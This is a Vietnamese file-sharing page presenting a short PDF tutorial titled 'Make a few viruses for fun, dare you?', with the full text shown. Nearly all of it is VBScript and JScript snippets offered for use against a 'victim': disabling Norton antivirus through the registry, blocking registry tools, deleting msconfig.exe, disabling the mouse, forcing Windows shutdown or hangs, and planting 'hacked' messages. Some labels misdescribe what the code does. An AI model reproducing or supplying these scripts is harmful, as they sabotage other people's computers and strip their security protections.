intTypePromotion=1
ADSENSE

Tự tạo vài con virus chơi, dám không?

Chia sẻ: ™——† Lvlr. DK †——™ »»» V.I.P ««« | Ngày: | Loại File: PDF | Số trang:2

468
lượt xem
137
download
 
  Download Vui lòng tải xuống để xem tài liệu đầy đủ

Tự tạo vài con virus chơi : Chỉ với Notepad hay Wordpad bạn đã có thể tự tạo cho mình 1 "chú" Virus dưới dạng VBSCRIPT hoặc Javascript rồi: Dưới đây là code của một số con virus nhỏ dưới dạng VBS: 1.Không cho victim khởi động máy: Dim wsh Set wsh = createobject("wscript.shell") wsh.run "RUNDLL32.EXE user.exe,exitwindows" 2. Disable NAV: Dim wsh Set wsh= CreateObject( "WScript.Shell") s1 = "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Norton Program Scheduler\Start" wsh.RegWrite s1,3, "REG_DWORD" 3. Hiển thị một message mỗi khi reboot máy: dim wsh Set wsh = CreateObject( "WScript.Shell" ) s1 = "HKLM\Software\Microsoft\Windows\CurrentVersion\WinLogon\" s2 = "LegalNoticeCaption" s3 = "LegalNoticeText" wsh.RegWrite...

Chủ đề:
Lưu

Nội dung Text: Tự tạo vài con virus chơi, dám không?

  1. Tự tạo vài con virus chơi : Ch ỉ với Notepad hay Wordpad bạn đã có thể tự tạo cho mình 1 "chú" Virus dưới dạng VBSCRIPT hoặc Javascript rồi: Dưới đây là code của một số con virus nhỏ dưới dạng VBS: 1.Không cho victim khởi động máy: Dim wsh Set wsh = createobject("wscript.shell") wsh.run "RUNDLL32.EXE user.exe,exitwindows" 2. Disable NAV: Dim wsh Set wsh= CreateObject( "WScript.Shell") s1 = "HKEY_LOCAL_MACHINE \System\CurrentControlSet\Services\Norton Program Scheduler\Start" wsh.RegWrite s1,3, "REG_DWORD" 3. Hiển thị một message mỗi khi reboot máy: dim wsh Set wsh = CreateObject( "WScript.Shell" ) s1 = "HKLM\Software\Microsoft\Windows\CurrentVersion \WinLogon\" s2 = "LegalNoticeCaption" s3 = "LegalNoticeText" wsh.RegWrite s1+s2, "http://dhth5th.net.tf" wsh.RegWrite s1+s3, "Welcome to DHTH5TH.NET.TF" 4. Hiển thị một dòng lệnh khi click vào file hay folder: set reg=createobject("WScript.shell") reg.regwrite "HKEY_CLASSES_ROOT \*\Shell\\","Hi ! This Windows was hacked by Wind" reg.regwrite "HKEY_CLASSES_ROOT \folder\shell\ Hi ! This Windows was hacked by Wind \","Wind" 5. Làm cho các trò trên hoạt động bình thường: Dim objShell Set objShell = CreateObject( "WScript.Shell" ) s1 = "HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion \" s2 = "Policies\System\DisableRegistryTools" objShell.RegWrite s1+s2,1, "REG_DWORD" Dưới dạng Javascipt : var wsh; wsh=new ActiveXObject ("Wscript.shell");
  2. // Winlogon when reboot var s1 = "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion \\WinLogon\\"; var s2 = "LegalNoticeCaption"; var s3 = "LegalNoticeText"; wsh.RegWrite (s1+ s2, "http://dhth5th.net.tf") ; wsh.RegWrite (s1+s3, " Welcome to DHTH5TH.NET.TF ") ; //Disable Registry var s1 = "HKEY_USERS \\.Default\\Software\\Microsoft\\Windows\\CurrentVersion\\"; var s2 = "Policies\\System\\DisableRegistryTools" ; wsh.RegWrite (s1+s2,0,"REG_DWORD"); //Delete file Msconfig.exe làm cho victim khởi động tới Registry luôn var fso; fso=new ActiveXObject("Scripting.FileSystemObject"); var fe=fso.getfile("C:\\windows\\msconfig.exe); fe.delete true; //Disable Mouse wsh.run ("RUNDLL32.EXE mouse,disable"); //Hang up windows wsh.run ("rundll32 user,disableoemlayer");
ADSENSE

CÓ THỂ BẠN MUỐN DOWNLOAD

 

Đồng bộ tài khoản
2=>2